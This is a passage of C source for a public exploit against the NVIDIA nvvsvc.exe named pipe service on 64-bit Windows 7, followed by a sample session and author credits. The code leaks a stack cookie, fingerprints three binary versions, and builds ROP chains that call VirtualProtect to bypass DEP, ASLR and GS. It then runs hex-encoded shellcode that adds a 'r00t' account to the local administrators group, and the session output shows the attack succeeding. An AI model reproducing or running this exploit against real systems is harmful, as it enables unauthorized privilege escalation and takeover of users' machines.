				"\x64\x20\x26\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72"
				"\x6f\x75\x70\x20\x61\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74"
				"\x6f\x72\x73\x20\x72\x30\x30\x74\x20\x2f\x61\x64\x64\x00";

			printf("Building exploit ...\n");
			unsigned __int64 uiStackCookie = *(unsigned __int64 *)(rgReadBuf + 0x4034);
			printf("\t\t => Stack cookie 0x%x%x:\n", (DWORD)(uiStackCookie >> 32), (DWORD)uiStackCookie);

			memcpy(rgConvoMsg[4].Buf + 0xc + 0xc, &uiStackCookie, 8);

			unsigned __int64 uiRetnAddress = *(unsigned __int64 *)(rgReadBuf + 0x4034 + 8), uiBase = 0, *pRopChain = NULL;

			// Perform some limited fingerprinting (my default install version, vs latest at time of testing)
			switch(uiRetnAddress & 0xfff)
			{
			case 0x640: // nvvsvc.exe - 03 Nov 2011 - 1,640,768 bytes - md5=3947ad5d03e6abcce037801162fdb90d
				{
					uiBase = uiRetnAddress - 0x4640;
					printf("\t\t => nvvsvc.exe base 0x%x%x:\n", (DWORD)(uiBase >> 32), (DWORD)uiBase);

					pRopChain = (unsigned __int64 *)(rgConvoMsg[4].Buf + 0xc + 0xc + (7*8));

					// Param 1: lpAddress [r11 (near rsp) into rcx]
					pRopChain[0] = uiBase + 0x19e6e; // nvvsvc.exe+0x19e6e: mov rax, r11; retn
					pRopChain[1] = uiBase + 0xa6d64; // nvvsvc.exe+0xa6d64: mov rcx, rax; mov eax, [rcx+4]; add rsp, 28h; retn
					pRopChain[2] = 0; // Padding
					pRopChain[3] = 0; // ...
					pRopChain[4] = 0; // ...
					pRopChain[5] = 0; // ...
					pRopChain[6] = 0; // ...
					pRopChain[7] = uiBase + 0x7773;  // nvvsvc.exe+0x7773: pop rax; retn
					pRopChain[8] = 0x1;   // Param 2: dwSize [rdx = 1 (whole page)]
					pRopChain[9] = uiBase + 0xa8653; // nvvsvc.exe+0xa8653: mov rdx, rax; mov rax, rdx; add rsp, 28h; retn
					pRopChain[10] = 0; // Padding
					pRopChain[11] = 0; // ...
					pRopChain[12] = 0; // ...
					pRopChain[13] = 0; // ...
					pRopChain[14] = 0; // ...
					pRopChain[15] = uiBase + 0x7772;  // nvvsvc.exe+0x7772: pop r8; retn
					pRopChain[16] = 0x40;  // Param 3: flNewProtect [r8 = 0x40 (PAGE_EXECUTE_READWRITE)]
					pRopChain[17] = uiBase + 0x7773;  // nvvsvc.exe+0x7773: pop rax; retn
					// Param 4: lpflOldProtect [r9 - already points at writable location]
					pRopChain[18] = uiBase + 0xfe5e0; // nvvsvc.exe+0xfe5e0: IAT entry &VirtualProtect
					pRopChain[19] = uiBase + 0x5d60;  // nvvsvc.exe+0x5d60: mov rax, [rax]; retn
					pRopChain[20] = uiBase + 0x91a85; // nvvsvc.exe+0x91a85: jmp rax
					pRopChain[21] = uiBase + 0xe6251; // nvvsvc.exe+0xe6251: jmp rsp (return address from VirtualProtect)

					memcpy(pRopChain + 22, pb_NetAdd_Admin, sizeof(pb_NetAdd_Admin));
				}
				break;
			case 0x9f1: // nvvsvc.exe - 30 Aug 2012 - 891,240 bytes - md5=43f91595049de14c4b61d1e76436164f
				{
					uiBase = uiRetnAddress - 0x39f1;
					printf("\t\t => nvvsvc.exe base 0x%x%x:\n", (DWORD)(uiBase >> 32), (DWORD)uiBase);

					pRopChain = (unsigned __int64 *)(rgConvoMsg[4].Buf + 0xc + 0xc + (7*8));

					// Param 1: lpAddress [r11 (near rsp) into rcx]
					pRopChain[0] = uiBase + 0x15d36; // nvvsvc.exe+0x15d36: mov rax, r11; retn
					pRopChain[1] = uiBase + 0x5493c; // nvvsvc.exe+0x5493c: mov rcx, rax; mov eax, [rcx+4]; add rsp, 28h; retn
					pRopChain[2] = 0; // Padding ...
					pRopChain[3] = 0; // ...
					pRopChain[4] = 0; // ...
					pRopChain[5] = 0; // ...
					pRopChain[6] = 0; // ...
					pRopChain[7] = uiBase + 0xd202;  // nvvsvc.exe+0xd202: pop rax; retn
					pRopChain[8] = 0x1;              // Param 2: dwSize [rdx = 1 (whole page)]
					pRopChain[9] = uiBase + 0x55dbf; // nvvsvc.exe+0x55dbf: mov rdx, rax; mov rax, rdx; add rsp, 28h; retn
					pRopChain[10] = 0; // Padding ...
					pRopChain[11] = 0; // ...
					pRopChain[12] = 0; // ...
					pRopChain[13] = 0; // ...
					pRopChain[14] = 0; // ...
					// Param 3: flNewProtect [r8 = 0x40 (PAGE_EXECUTE_READWRITE)]
					pRopChain[15] = uiBase + 0xd202;  // nvvsvc.exe+0xd202: pop rax; retn
					pRopChain[16] = 0x40;             // PAGE_EXECUTE_READWRITE
					pRopChain[17] = uiBase + 0x8b92;  // nvvsvc.exe+0x55dbf: mov r8d, eax; mov eax, r8d; add rsp, 28h; retn
					pRopChain[18] = 0; // Padding ...
					pRopChain[19] = 0; // ...
					pRopChain[20] = 0; // ...
					pRopChain[21] = 0; // ...
					pRopChain[22] = 0; // ...
					// Param 4: lpflOldProtect [r9 - already points at writable location]
					pRopChain[23] = uiBase + 0xd202;  // nvvsvc.exe+0xd202: pop rax; retn
					pRopChain[24] = uiBase + 0x91308; // IAT entry &VirtualProtect - 0x130
					pRopChain[25] = uiBase + 0x82989; // nvvsvc.exe+0x82989: mov rax, [rax+130h]; add rsp, 28h; retn
					pRopChain[26] = 0; // Padding ...
					pRopChain[27] = 0; // ...
					pRopChain[28] = 0; // ...
					pRopChain[29] = 0; // ...
					pRopChain[30] = 0; // ...
					pRopChain[31] = uiBase + 0x44ba6; // nvvsvc.exe+0x44ba6: jmp eax
					pRopChain[32] = uiBase + 0x77c59; // nvvsvc.exe+0x77c59: jmp esp

					memcpy(pRopChain + 33, pb_NetAdd_Admin, sizeof(pb_NetAdd_Admin));
				}
				break;
			case 0xa11: // nvvsvc.exe - 01 Dec 2012 - 890,216 md5=3341d2c91989bc87c3c0baa97c27253b
				{
					uiBase = uiRetnAddress - 0x3a11;
					printf("\t\t => nvvsvc.exe base 0x%x%x:\n", (DWORD)(uiBase >> 32), (DWORD)uiBase);

					pRopChain = (unsigned __int64 *)(rgConvoMsg[4].Buf + 0xc + 0xc + (7*8));

					// Param 1: lpAddress [r11 (near rsp) into rcx]
					pRopChain[0] = uiBase + 0x15b52;    // nvvsvc.exe+0x15b52: mov rax, r11; retn
					pRopChain[1] = uiBase + 0x54d4c;    // nvvsvc.exe+0x54d4c: mov rcx, rax; mov eax, [rcx+4]; add rsp, 28h; retn
					pRopChain[2] = 0;  // Padding ...
					pRopChain[3] = 0;  // ...
					pRopChain[4] = 0;  // ...
					pRopChain[5] = 0;  // ...
					pRopChain[6] = 0;  // ...
					pRopChain[7] = uiBase + 0x8d7aa;    // nvvsvc.exe+0x8d7aa: pop rdx; add al, 0; pop rbp; retn
					pRopChain[8] = 0x1;                 // Param 2: dwSize [rdx = 1 (whole page)]
					pRopChain[9] = 0;                   // Padding ...
					// Param 3: flNewProtect [r8 = 0x40 (PAGE_EXECUTE_READWRITE)]
					pRopChain[10] = uiBase + 0xd33a;    // nvvsvc.exe+0xd33a: pop rax; retn
					pRopChain[11] = 0x40;               // PAGE_EXECUTE_READWRITE
					pRopChain[12] = uiBase + 0x8d26;    // nvvsvc.exe+0x8d26: mov r8d, eax; mov eax, r8d; add rsp, 28h; retn
					pRopChain[13] = 0; // Padding ...
					pRopChain[14] = 0; // ...
					pRopChain[15] = 0; // ...
					pRopChain[16] = 0; // ...
					pRopChain[17] = 0; // ...
					// Param 4: lpflOldProtect [r9 - already points at writable location]
					pRopChain[18] = uiBase + 0xd33a;    // nvvsvc.exe+0xd33a: pop rax; retn
					pRopChain[19] = uiBase + 0x91310;   // IAT entry &VirtualProtect - 0x128
					pRopChain[20] = uiBase + 0x82851;   // nvvsvc.exe+0x82851: mov rax, [rax+128h]; add rsp, 28h; retn
					pRopChain[21] = 0; // Padding ...
					pRopChain[22] = 0; // ...
					pRopChain[23] = 0; // ...
					pRopChain[24] = 0; // ...
					pRopChain[25] = 0; // ...
					pRopChain[26] = uiBase + 0x44fb6;   // nvvsvc.exe+0x44fb6: jmp rax
					pRopChain[27] = uiBase + 0x8a0dc;   // nvvsvc.exe+0x8a0dc: push rsp; retn

					memcpy(pRopChain + 28, pb_NetAdd_Admin, sizeof(pb_NetAdd_Admin));
				}
				break;
			}

			break;
		}

		i++;
	}

	dwReturnCode = 0;
Cleanup:
	if(hPipe)
		CloseHandle(hPipe);

	return dwReturnCode;
}

Sample Session

C:\Users\Peter\Desktop\NVDelMe1>net localgroup administrators
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
Peter
The command completed successfully.

C:\Users\Peter\Desktop\NVDelMe1>nvvsvc_expl.exe 127.0.0.1
  ** Nvvsvc.exe Nsvr Pipe Exploit (Local/Domain) **
                 [@peterwintrsmith]
 - Win7 x64 DEP + ASLR + GS Bypass - Christmas 2012 -

        Action 1 of 9:  - CONNECT

        Action 2 of 9:  - CLIENT => SERVER
                Written 16416 (0x4020) characters to pipe

        Action 3 of 9:   - SERVER => CLIENT
                Read 16504 (0x4078) characters from pipe

        Action 4 of 9: Building exploit ...
                 => Stack cookie 0xe2e2893340d4:
                 => nvvsvc.exe base 0x13fb90000:

        Action 5 of 9:  - CLIENT => SERVER
                Written 16416 (0x4020) characters to pipe

        Action 6 of 9:   - SERVER => CLIENT
                Read 16384 (0x4000) characters from pipe

        Action 7 of 9:  - CLIENT => SERVER
                Written 16416 (0x4020) characters to pipe

        Action 8 of 9:   - SERVER => CLIENT
                Read 16896 (0x4200) characters from pipe

        Action 9 of 9:  - DISCONNECT

C:\Users\Peter\Desktop\NVDelMe1>net localgroup administrators
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
Peter
r00t
The command completed successfully.

C:\Users\Peter\Desktop\NVDelMe1>

Credit: peterwintrsmith and seanderegge